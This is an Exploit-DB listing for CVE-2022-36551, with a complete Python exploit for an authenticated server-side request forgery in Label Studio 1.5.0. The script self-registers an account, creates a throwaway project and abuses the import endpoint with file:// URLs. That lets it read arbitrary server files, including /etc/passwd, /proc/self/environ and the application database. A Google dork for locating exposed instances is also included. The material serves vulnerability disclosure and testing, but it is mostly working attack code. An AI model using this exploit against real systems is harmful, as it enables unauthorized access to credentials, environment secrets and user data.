Label Studio 1.5.0 – Authenticated Server Side Request Forgery (SSRF)

  • 作者: Ryan Smith
    日期: 2023-03-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51109/
  • # Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)
    # Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"
    # Date: 2022-10-03
    # Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com
    # Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/
    # Software Link: https://github.com/heartexlabs/label-studio/releases
    # Version: <=1.5.0
    # CVE : CVE-2022-36551
    # Docker Container: heartexlabs/label-studio
    
    # Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition 
    # versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system. 
    # Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote 
    # attacker to create a new account and then exploit the SSRF.
    
    #
    # This exploit has been tested on Label Studio 1.5.0
    #
    
    # Exploit Usage Examples (replace with your target details):
    # - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd
    # - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ
    # - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3
    
    
    import json
    import argparse
    import requests
    import shutil
    from urllib.parse import urljoin
    from urllib.parse import urlparse
    requests.packages.urllib3.disable_warnings() 
    
    # main function for exploit
    def main(url, filePath, writePath, username, password, shouldRegister):
        """Run the proof of concept end to end.

        Steps: check that ``url`` answers with HTTP 200, log in (optionally
        registering the account), create a temporary project, import
        ``filePath`` into it via ``fetch_file``, then delete the project.

        Args:
            url: Base URL of the Label Studio instance.
            filePath: Path or URL to request through the import endpoint.
            writePath: Local path to write the result to, or ``None`` to
                print it to stdout.
            username: Account email.
            password: Account password.
            shouldRegister: Truthy to register the account when login fails.

        Exits with status 1 if the URL is unreachable or does not return 200.
        """
        # check if the URL is reachable; only the request itself is guarded
        try:
            r = requests.get(url, verify=False)
        except requests.exceptions.RequestException:
            print("[!] Error: URL is not reachable, check the URL and try again")
            exit(1)

        if r.status_code != 200:
            print("[!] Error: URL is not reachable, check the URL and try again")
            exit(1)
        print("[+] URL is reachable")

        session = requests.Session()

        login(session, url, username, password, shouldRegister)
        print("[+] Logged in")
        print("[+] Creating project...")

        # Create a temp project
        projectDetails = create_project(session, url)
        projectId = projectDetails["id"]
        print("[+] Project created, ID: {}".format(projectId))

        try:
            # import a "file" to the newly created project
            # (IE: file:///etc/passwd, or file:///proc/self/environ)
            print("[+] Attempting to fetch: {}".format(filePath))
            fetch_file(session, url, projectId, filePath, writePath)
        finally:
            # Always clean up the temporary project, even when the fetch raised,
            # so nothing is left behind on the server.
            print("[+] Deleting Project.. {}".format(projectId))
            delete_project(session, url, projectId)
            print("[+] Project Deleted")

        print("[*] Finished executing exploit")
    
    
    # login, logs the user in
    def login(session, url, username, password, shouldRegister):
        """Authenticate ``session`` against the instance at ``url``.

        Fetches the main page so the ``csrftoken`` cookie is set, then posts
        the credentials to ``/user/login``. If the response contains the
        bad-credentials message and ``shouldRegister`` is truthy, posts the
        same credentials to ``/user/signup/`` instead.

        Args:
            session: ``requests.Session`` that will carry the auth cookies.
            url: Base URL of the Label Studio instance.
            username: Account email.
            password: Account password.
            shouldRegister: Truthy to attempt registration when login fails.

        Returns:
            None on success. Exits with status 1 when login fails, or when
            registration does not answer with a redirect.

        Raises:
            KeyError: If no ``csrftoken`` cookie was set by the first request.
        """
        failureMarker = "The email and password you entered"

        # hit the main page first to get the CSRF token set
        session.get(url, verify=False)

        r = session.post(
            urljoin(url, "/user/login"),
            data={
                "email": username,
                "password": password,
                "csrfmiddlewaretoken": session.cookies["csrftoken"],
            },
            verify=False,
        )

        # Use `in` so a marker at offset 0 is also detected.
        badCredentials = failureMarker in r.text

        if r.status_code == 200 and not badCredentials:
            return

        if badCredentials and shouldRegister:
            print("[!] Account does not exist, registering...")
            r = session.post(
                urljoin(url, "/user/signup/"),
                data={
                    "email": username,
                    "password": password,
                    "csrfmiddlewaretoken": session.cookies["csrftoken"],
                    'allow_newsletters': False,
                },
                verify=False,
            )
            # requests follows redirects by default, so the 302 that signals a
            # successful signup is normally found in r.history rather than on
            # the final response.
            redirected = r.status_code == 302 or any(
                hop.status_code == 302 for hop in r.history
            )
            if redirected:
                # at this point the system automatically logs you in (assuming
                # self-registration is enabled, which it is by default)
                return

            print("[!] Error: Could not register the account")
            exit(1)

        print("[!] Error: Could not login, check the credentials and try again")
        exit(1)
    
    
    # create_project creates a temporary project for exploiting the SSRF
    def create_project(session, url):
        """Create the temporary project and return its JSON description.

        Posts a fixed title to ``/api/projects`` using ``session``.

        Returns:
            The decoded JSON body when the server answers 200 or 201.
            Exits with status 1 on any other status code.
        """
        endpoint = urljoin(url, "/api/projects")
        payload = {"title": "TPS Report Finder"}

        response = session.post(endpoint, data=payload, verify=False)

        if response.status_code not in (200, 201):
            print("[!] Error: Could not create project, check your credentials / permissions")
            exit(1)

        return response.json()
    
    def fetch_file(session, url, projectId, filePath, writePath):
        """Import ``filePath`` into the project and output what was stored.

        Posts ``filePath`` as the ``url`` field to the project's import
        endpoint. On HTTP 201 it looks up the first uploaded file's record,
        downloads it from ``/data/<file>``, and either writes it to
        ``writePath`` or prints it. On any other status it prints the
        server's error and returns.

        Args:
            session: Authenticated ``requests.Session``.
            url: Base URL of the Label Studio instance.
            projectId: ID of the project to import into.
            filePath: Path or URL to import; ``file://`` is prepended when it
                has no scheme.
            writePath: Local path to write to, or ``None`` to print to stdout.

        Returns:
            None.
        """
        # if scheme is empty prepend file://
        if urlparse(filePath).scheme == "":
            filePath = "file://" + filePath

        headers = {
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        r = session.post(
            urljoin(url, "/api/projects/{}/import".format(projectId)),
            data={
                # This is the main vulnerability, there is no restriction on
                # the scheme of the provided URL
                "url": filePath,
            },
            headers=headers,
            verify=False,
        )

        if r.status_code != 201:
            print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")
            # The error body is not guaranteed to have the validation-error
            # shape (or to be JSON at all); fall back to the raw text instead
            # of raising.
            try:
                detail = r.json()["validation_errors"]["non_field_errors"][0]
            except (ValueError, KeyError, IndexError, TypeError):
                detail = r.text
            print("\t{}".format(detail))
            return

        # file found! -- first grab the file path details
        fileId = r.json()["file_upload_ids"][0]
        r = session.get(
            urljoin(url, "/api/import/file-upload/{}".format(fileId)),
            headers=headers,
            verify=False,
        )
        r = session.get(
            urljoin(url, "/data/{}".format(r.json()["file"])),
            headers=headers,
            verify=False,
            stream=True,
        )
        print("[+] File found!")

        # if user wants to write to disk, make it so
        if writePath is not None:
            print("[+] Writing to {}".format(writePath))
            # iter_content applies any Content-Encoding (gzip/deflate) decoding;
            # copying r.raw directly would write the still-compressed bytes.
            with open(writePath, 'wb') as handle:
                for chunk in r.iter_content(chunk_size=65536):
                    handle.write(chunk)
            return

        print("==========================================================")
        print(r.text)
        print("==========================================================")
    
    
    def delete_project(session, url, projectId):
        """Delete the project with ID ``projectId``.

        Sends a DELETE to ``/api/projects/<projectId>`` using ``session``.
        Returns None on a 200 or 204 response; exits with status 1 otherwise.
        """
        endpoint = urljoin(url, "/api/projects/{}".format(projectId))
        response = session.delete(endpoint, verify=False)

        if response.status_code not in (200, 204):
            print("[!] Error: Could not delete project, check your credentials / permissions")
            exit(1)
    
    if __name__ == "__main__":
        # Command-line entry point: parse the options and hand them to main().
        # Guarded so that importing this module does not parse sys.argv or
        # start a run.
        parser = argparse.ArgumentParser()

        parser.add_argument("--url", required=True, help="Label Studio URL")
        parser.add_argument("--file", required=True, help="Path to the file you want to fetch")
        parser.add_argument("--out", required=False, help="Path to write the file.If omitted will be written to STDOUT")
        parser.add_argument("--username", required=False, help="Username for existing account (email)")
        parser.add_argument("--password", required=False, help="Password for existing account")
        # BooleanOptionalAction also generates a matching --no-register flag.
        parser.add_argument(
            "--register",
            required=False,
            action=argparse.BooleanOptionalAction,
            help="Register user if it doesn't exist",
        )

        args = parser.parse_args()
        main(args.url, args.file, args.out, args.username, args.password, args.register)